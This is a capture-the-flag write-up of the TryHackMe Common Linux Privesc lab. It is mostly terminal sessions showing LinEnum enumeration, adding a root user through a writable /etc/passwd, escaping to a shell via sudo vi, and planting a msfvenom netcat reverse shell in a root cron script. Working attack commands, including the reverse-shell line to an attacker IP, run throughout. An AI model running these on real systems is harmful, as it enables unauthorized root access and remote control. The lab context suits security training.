TryHackMe(THM): Common Linux Privesc-Writeup

nmz@kali:~$ ssh user3@10.10.139.78
user3@polobox:~$

nmz@kali:~/work/LinEnum$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

user3@polobox:~$ wget 10.4.20.231:8000/LinEnum.sh
--2020-11-27 05:58:29--  http://10.4.20.231:8000/LinEnum.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh               100%[==================================>]  45.54K  56.5KB/s    in 0.8s    

2020-11-27 05:58:31 (56.5 KB/s) - ‘LinEnum.sh’ saved [46631/46631]

user3@polobox:~$ chmod +x LinEnum.sh
user3@polobox:~$ ./LinEnum.sh |tee output.txt

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false
ntp:x:109:119::/home/ntp:/bin/false
avahi:x:110:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
nm-openconnect:x:114:124:NetworkManager OpenConnect plugin,,,:/var/lib/NetworkManager:/bin/false
nm-openvpn:x:115:125:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/bin/false
pulse:x:116:126:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:117:128:RealtimeKit,,,:/proc:/bin/false
saned:x:118:129::/var/lib/saned:/bin/false
usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:103:105::/var/lib/geoclue:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
user1:x:1000:1000:user1,,,:/home/user1:/bin/bash
user2:x:1001:1001:user2,,,:/home/user2:/bin/bash
user3:x:1002:1002:user3,,,:/home/user3:/bin/bash
user4:x:1003:1003:user4,,,:/home/user4:/bin/bash
statd:x:120:65534::/var/lib/nfs:/usr/sbin/nologin
user5:x:1004:1004:user5,,,:/home/user5:/bin/bash
user6:x:1005:1005:user6,,,:/home/user6:/bin/bash
mysql:x:121:131:MySQL Server,,,:/var/mysql:/bin/bash
user7:x:1006:0:user7,,,:/home/user7:/bin/bash
user8:x:1007:1007:user8,,,:/home/user8:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5  *    * * * root    /home/user4/Desktop/autoscript.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar  6  2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun  5  2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22  2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar  6  2020 /etc/shadow

user3@polobox:~$ ls -l
total 180
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Desktop
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Documents
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Downloads
-rwxrwxr-x 1 user3 user3 46631 Nov 27 05:46 LinEnum.sh
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Music
-rw-rw-r-- 1 user3 user3 89918 Nov 27 06:01 output.txt
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Pictures
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Public
-rwsr-xr-x 1 root  root   8392 Jun  4  2019 shell
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Templates
drwxr-xr-x 2 user3 user3  4096 Jun  4  2019 Videos

user7@polobox:/home/user3$ openssl passwd -1 -salt new 123
$1$new$p7ptkEKU1HnaHpRtzNizS1

nano /etc/passwd
...
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

user8@polobox:/home/user7$ sudo -l
Matching Defaults entries for user8 on polobox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user8 may run the following commands on polobox:
    (root) NOPASSWD: /usr/bin/vi

user8@polobox:/home/user7$ sudo vi

:!sh

# ヘルプをみる
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --service-name    <value>    The service name to use when generating a service binary
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message


# シェルをつくる
nmz@kali:~/THM/CommonLinuxPrivesc$ msfvenom -p cmd/unix/reverse_netcat lhost=10.4.20.231 lport=8888 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 89 bytes
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

# msfvenomでできたスクリクトをechoでファイルにする
nmz@kali:~/THM/CommonLinuxPrivesc$ echo 'mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk' > autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ ls
autoscript.sh
nmz@kali:~/THM/CommonLinuxPrivesc$ cat autoscript.sh 
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

user4@polobox:~/Desktop$ cp autoscript.sh bk_autoscript.sh
user4@polobox:~/Desktop$ ls
autoscript.sh     computer.desktop    network.desktop     settings.desktop
bk_autoscript.sh  helpmanual.desktop  recyclebin.desktop  userfiles.desktop
user4@polobox:~/Desktop$ wget 10.4.20.231:8000/autoscript.sh
--2020-11-29 22:12:02--  http://10.4.20.231:8000/autoscript.sh
Connecting to 10.4.20.231:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90 [text/x-sh]
Saving to: ‘autoscript.sh.1’
autoscript.sh.1     100%[===================>]      90  --.-KB/s    in 0s     
2020-11-29 22:12:03 (13.6 MB/s) - ‘autoscript.sh.1’ saved [90/90]
user4@polobox:~/Desktop$ ls
autoscript.sh     computer.desktop    recyclebin.desktop
autoscript.sh.1   helpmanual.desktop  settings.desktop
bk_autoscript.sh  network.desktop     userfiles.desktop
user4@polobox:~/Desktop$ rm autoscript.sh
user4@polobox:~/Desktop$ cp autoscript.sh.1 autoscript.sh
user4@polobox:~/Desktop$ cat autoscript.sh
mkfifo /tmp/yflk; nc 10.4.20.231 8888 0</tmp/yflk | /bin/sh >/tmp/yflk 2>&1; rm /tmp/yflk

nmz@kali:~/THM/CommonLinuxPrivesc$ nc -lvp 8888
listening on [any] 8888 ...
10.10.223.125: inverse host lookup failed: Unknown host
connect to [10.4.20.231] from (UNKNOWN) [10.10.223.125] 46966
whoami
root